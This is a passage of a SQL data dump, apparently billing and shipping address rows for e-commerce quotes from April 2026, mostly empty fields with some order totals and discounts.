(1971, 1169, '2026-04-27 08:52:34', '2026-04-27 08:52:34', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1972, 1169, '2026-04-27 08:52:34', '2026-04-27 08:52:34', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1973, 1170, '2026-04-27 14:15:58', '2026-04-27 14:15:58', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1974, 1170, '2026-04-27 14:15:58', '2026-04-27 14:15:58', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1975, 1171, '2026-04-27 16:17:05', '2026-04-27 16:17:05', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1976, 1171, '2026-04-27 16:17:05', '2026-04-27 16:17:05', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1977, 1172, '2026-04-27 18:42:04', '2026-04-27 18:42:04', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1978, 1172, '2026-04-27 18:42:04', '2026-04-27 18:42:04', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 422.0000, 422.0000, 337.6000, 337.6000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -84.4000, -84.4000, 337.6000, 337.6000, NULL, '[]', NULL, 0.0000, 0.0000, 422.0000, 422.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1979, 1173, '2026-04-27 20:07:44', '2026-04-27 20:07:44', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1980, 1173, '2026-04-27 20:07:44', '2026-04-27 20:07:44', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1981, 1174, '2026-04-27 20:13:37', '2026-04-27 20:13:37', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1982, 1174, '2026-04-27 20:13:37', '2026-04-27 20:13:37', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1983, 1175, '2026-04-27 20:21:46', '2026-04-27 20:21:46', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1984, 1175, '2026-04-27 20:21:46', '2026-04-27 20:21:46', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1985, 1176, '2026-04-27 20:44:22', '2026-04-27 20:44:22', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1986, 1176, '2026-04-27 20:44:22', '2026-04-27 20:44:22', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1987, 1177, '2026-04-27 21:44:37', '2026-04-27 21:44:37', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1988, 1177, '2026-04-27 21:44:37', '2026-04-27 21:44:37', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1989, 1178, '2026-04-27 22:25:41', '2026-04-27 22:25:41', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1990, 1178, '2026-04-27 22:25:41', '2026-04-27 22:25:41', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 422.0000, 422.0000, 337.6000, 337.6000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -84.4000, -84.4000, 337.6000, 337.6000, NULL, '[]', NULL, 0.0000, 0.0000, 422.0000, 422.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1991, 1179, '2026-04-27 23:52:28', '2026-04-27 23:52:28', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1992, 1179, '2026-04-27 23:52:28', '2026-04-27 23:52:28', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1993, 1180, '2026-04-28 00:13:24', '2026-04-28 00:13:24', 136, 0, NULL, 'billing', 'c.ahu.wu.zog.a.w0.4@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1994, 1180, '2026-04-28 00:13:24', '2026-04-28 00:13:24', 136, 0, NULL, 'shipping', 'c.ahu.wu.zog.a.w0.4@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1995, 1181, '2026-04-28 00:44:24', '2026-04-28 00:44:24', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1996, 1181, '2026-04-28 00:44:24', '2026-04-28 00:44:24', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 422.0000, 422.0000, 337.6000, 337.6000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -84.4000, -84.4000, 337.6000, 337.6000, NULL, '[]', NULL, 0.0000, 0.0000, 422.0000, 422.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1997, 1182, '2026-04-28 05:06:07', '2026-04-28 05:06:07', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1998, 1182, '2026-04-28 05:06:07', '2026-04-28 05:06:07', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1999, 1183, '2026-04-28 05:43:08', '2026-04-28 05:43:08', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2000, 1183, '2026-04-28 05:43:08', '2026-04-28 05:43:08', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2001, 1184, '2026-04-28 06:56:36', '2026-04-28 06:56:36', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2002, 1184, '2026-04-28 06:56:36', '2026-04-28 06:56:36', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2003, 1185, '2026-04-28 07:22:41', '2026-04-28 07:22:41', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2004, 1185, '2026-04-28 07:22:41', '2026-04-28 07:22:41', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2005, 1186, '2026-04-28 08:34:33', '2026-04-28 08:34:33', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2006, 1186, '2026-04-28 08:34:33', '2026-04-28 08:34:33', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 422.0000, 422.0000, 337.6000, 337.6000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -84.4000, -84.4000, 337.6000, 337.6000, NULL, '[]', NULL, 0.0000, 0.0000, 422.0000, 422.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(2007, 1187, '2026-04-28 10:36:44', '2026-04-28 10:36:44', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2008, 1187, '2026-04-28 10:36:44', '2026-04-28 10:36:44', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2009, 1188, '2026-04-28 12:47:22', '2026-04-28 12:47:22', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2010, 1188, '2026-04-28 12:47:22', '2026-04-28 12:47:22', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(2011, 1189, '2026-04-28 15:09:24', '2026-04-28 15:09:24', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2012, 1189, '2026-04-28 15:09:24', '2026-04-28 15:09:24', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2013, 1190, '2026-04-28 16:56:44', '2026-04-28 16:56:44', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2014, 1190, '2026-04-28 16:56:44', '2026-04-28 16:56:44', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2015, 1191, '2026-04-28 18:23:18', '2026-04-28 18:23:18', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2016, 1191, '2026-04-28 18:23:18', '2026-04-28 18:23:18', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
